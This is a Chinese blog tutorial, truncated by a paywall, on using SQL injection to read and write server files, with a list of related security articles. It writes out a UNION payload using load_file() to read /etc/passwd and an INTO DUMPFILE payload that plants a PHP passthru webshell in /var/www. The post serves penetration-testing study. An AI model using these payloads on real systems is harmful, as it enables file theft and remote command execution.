sql注入2————对系统文件的操作

最新推荐文章于 2025-06-12 17:08:53 发布
原创 最新推荐文章于 2025-06-12 17:08:53 发布 · 602 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全 #sql注入 #web渗透 #渗透测试

本文探讨了SQL注入中如何利用Burpsuite进行系统文件的操作,包括读取和写入文件,以及编码绕过策略。文章指出,尽管可以成功上传文件,但因权限限制无法直接利用,强调了合理配置数据库权限在防护中的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

上一篇文档介绍了sql注入的一些原理和查询方式,这一篇算是作为一个拓展思路;并且这里重新介绍一种工具burpsuite,虽然也是利用url提交,但是更简洁一些

burpsuite准备

1、我们现在sql注入界面截断代理,随机提交一个参数;然后转向burp选择正确的请求;然后发送到repeater(如下图);
在这里插入图片描述
2、在repeater下选择params可以直接更改参数重复提交验证;
在这里插入图片描述

读取文件(假设有读取权限)

数据库查询语句中有一个函数load_file()可以提供查询系统文件信息

命令:' union select null,load_file('系统文件地址')--+
图例查看了/etc/passwd文件,如图在界面显示了哦(raw也有)

在这里插入图片描述

写入文件

我们在第二个参数写入一句话木马通过函数dumpfile上传到/var/www.目录下;
' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+
这是一个最理想的目录,这一我们就可以在当前页面响应到我们的木马

最低0.47元/天 解锁文章

200万优质内容无限畅学
利用 SQL 注入修改目录权限
Kane 's Blog [A.D.K]
01-04 1952
注入拥有sa权限,提升webshell权限! Cacls显示或修改指定文件上的随机访问控制列表 (DACL)。语法cacls FileName [/t] [/e [/r User [...]]] [/c] [/g User:Permission] [/p User:Permission [...]] [/d User [...]]参数FileName 必需
sql注入初学——松风1
08-03
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能正确过滤或验证用户输入的情况下,允许攻击者向SQL查询中插入恶意代码。本文将深入探讨SQL注入的基本概念、检测方法以及针对不同数据库类型的识别技术。 ...
SQL注入文件操作
qq_43936524的博客
04-15 817
文章目录函数写文件前提条件写入函数日志写文件前提条件日志种类慢查询日志读文件前提条件读取函数参考文章 函数写文件 前提条件 1.有网站的绝对路径 2.数据库secure_file_priv包含了写入的路径 secure_file_priv secure_file_priv 为 NULL 时,表示限制mysqld不允许导入或导出。 secure_file_priv 为 /tmp 时,表示限制mysqld只能在/tmp目录中执行导入导出,其他目录不能执行。 secure_file_priv 没有值时,表示不限
web渗透-SQL注入文件操作
豆豆不在了
03-01 1045
SQL文件操作原理 在判定数据库连接权限的条件下,利用SQL操作函数 SELECT LOAD_FILE('E://test.txt') #下载文件 or SELECT 'nihao' INTO OUTFILE 'E://test1.txt' #上传写入文件 语句对网站服务器进行本地文件操作。 一般只有root连接用户才能进行文件操作。 攻击步骤: 1.获
BugKu Web渗透之各种绕过哟
最新发布
cai_huaer的博客
06-12 355
看代码,就是需要三个参数,其中id和uname是get请求,passwd是post请求。然后uname和passed不能相等,但是他们的sha1值需要全等于(类型也要一样),id参数的值在url解码后为margin。当然,也可以在bp中直接更改加参数,我个人觉得hacker bar更加方便。再想想,如果都是数组的话经过加密后也是Null,那么这样对比应该也是一样的,于是尝试把uname和passwd改成数组。首先因为是英文margin,所以url加密后也是margin。尝试请求,结果flag出现,如下图。
sql注入系统学习
wanan的博客
10-09 434
sql注入系统学习
SQl注入文件上传及sqli-labs第七关less-7
wanggonghanfei的博客
10-06 1776
参数secure_file_priv 为 NULL 时,表示限制mysqld不允许导入或导出。secure_file_priv 为 /tmp 时,表示限制mysqld只能在/tmp目录中执行导入导出,其他目录不能导出导入。secure_file_priv 没有值时,表示不限制mysqld在任意目录的导入导出。可以使用下面语句查看该值:secure_file_priv的值可以修改,在MySQL安装路径下的my.ini文件中因为此次测试需要读写权限,我将其值修改为我的网站根目录。然后查询。
SQL注入防护——从一款注入工具入侵原理入手.pdf
09-19
SQL注入是一种常见的网络攻击手段,攻击者通过在Web应用程序的输入字段中插入恶意的SQL代码片段,使得原本用于数据查询和管理的SQL语句被篡改,从而让攻击者能够绕过应用程序的安全限制,直接对数据库进行操作SQL...
SQL注入——mssql注入
01-19
1、Mssql权限问题 Mssql角色: 服务器角色–针对运行整个数据库服务器设定的角色和权限。 ... 数据库角色–针对某个特定... 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_serveroption)。
SQL注入简单总结——过滤逗号注入.pdf
04-08
"SQL注入简单总结——过滤逗号注入"的主题主要探讨了如何处理那些针对逗号(`,`)进行过滤的SQL注入情况。在SQL语句中,逗号常用于分隔不同的元素,例如在`UNION`、`LIMIT`等子句中。 1. **过滤逗号的绕过方法**: ...
SQL之利用操作系统
Jim的博客
08-15 744
二.执行操作系统命令 提升权限(获取管理员权限): 1.SQL Server openrowset命令:SQL Server 2000上,所有用户均可调用openrowset, 而在SQL Server 2005上,该操作默认被禁用 2.Oracle 在Oracle中,通过web应用的SQL注入来提升权限非常困难。大多数提升权限的方法均需要PL/SQL注入。 执行操作系统命令: 1.
sqlserver中如何使用操作系统文件?如何读写文件?--抄录
ycs_wokao的博客
06-02 229
请问在sqlserver中如何使用操作系统文件?如何读写文件? DECLARE @object int DECLARE @hr int DECLARE @src varchar(255), @desc varchar(255) Declare @tmp int declare @msg varchar(3000) SET @msg=‘Hello...
请问在sqlserver中如何使用操作系统文件?如何读写文件
It's my life
07-11 751
  DECLARE   @object   int     DECLARE   @hr   int     DECLARE   @src   varchar(255),   @desc   varchar(255)     Declare   @tmp   int     declare   @msg   varchar(3000)         SET   @msg=Hello.   MS
bugkuCTF 各种绕过哟
qq_44682929的博客
09-09 435
uname和passwd不能相等,但是sha1后要求相等,这里用到了php sha1绕过漏洞,技巧就是当传入数组时会报错,返回null,如果两个参数都传入数组时会直接相等.可以采用数组绕过的还有md5(),strpos(),strcmp()。另外如果采用==比较,可以利用php弱类型性质。这些数据经过md5加密后均为0e开头,会被视为科学计数法,值为0,所以相等。
SQL注入(查询注入
m0_61974571的博客
10-12 1863
如果使用config的认证方式,则直接进入后台,如果为http,可以进行爆破,最好不要开启phpmyadmin,或者在需要的时候再开启远程登陆,修改/opt/lampp/etc/extra/http-xampp.conf文件禁用远程访问。使用方法:https://blog.youkuaiyun.com/kikajack/article/details/80065753。上述语法主要针对mysql数据库,如果针对其他数据库,需要使用其他数据库的语法。3、Web页面中有两个SQL查询语句,查询的列数不相同。
Bugku_web_各种绕过呦
qq_68457525的博客
07-14 400
ctf练习之哈希绕后和简单代码审计
SQL注入技术
qq_25981849的博客
02-14 496
SQL注入技术 漏洞成因 SQL注入漏洞的原因是由于程序员没有严格过滤用户输入,导致用户输入语句与数据库语句拼接成了一个新的合法语句所产生的漏洞。 SQL注入应用技术 SQL注入可以用来读取文件、写入文件、执行系统命令。 SQL注入的不同类型和常用函数 有回显的注入 有回显的漏洞直接走一遍标准流程就行了 报错注入 有的时候页面会显示sql报错,在这种情况下,我们可以通过人为的报错将不可见的信息转换在错误信息显示出来。 updatexml报错注入 uname=Dumb&passwd=0' or upd
bugku ctf 各种绕过 (各种绕过哟)
qq_42777804的博客
08-17 6854
打开打开       阅读代码 发现 只要使uname的sha1的值与passwd的sha1的值相等即可,但是同时他们两个的值又不能相等 构造 http://120.24.86.145:8002/web7/?uname[]=1&amp;id=margin   并发送  passwd[]=2 的 postdata 请求即可   依旧利用简单 有特别 好安装的  火狐 插件 ...
【实训04】数据库SQL注入漏洞
qq_62277763的博客
10-17 2181
【实训04】数据库SQL注入漏洞
掌握SQL注入利器——sqlmap-0.9版本发布
1. SQL注入技术:SQL注入是一种代码注入技术,攻击者利用web应用的安全漏洞,通过SQL命令对数据库进行未授权的查询、修改、添加或删除操作Sqlmap是自动化执行这些操作的工具之一。 2. 数据库管理系统(DBMS):...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值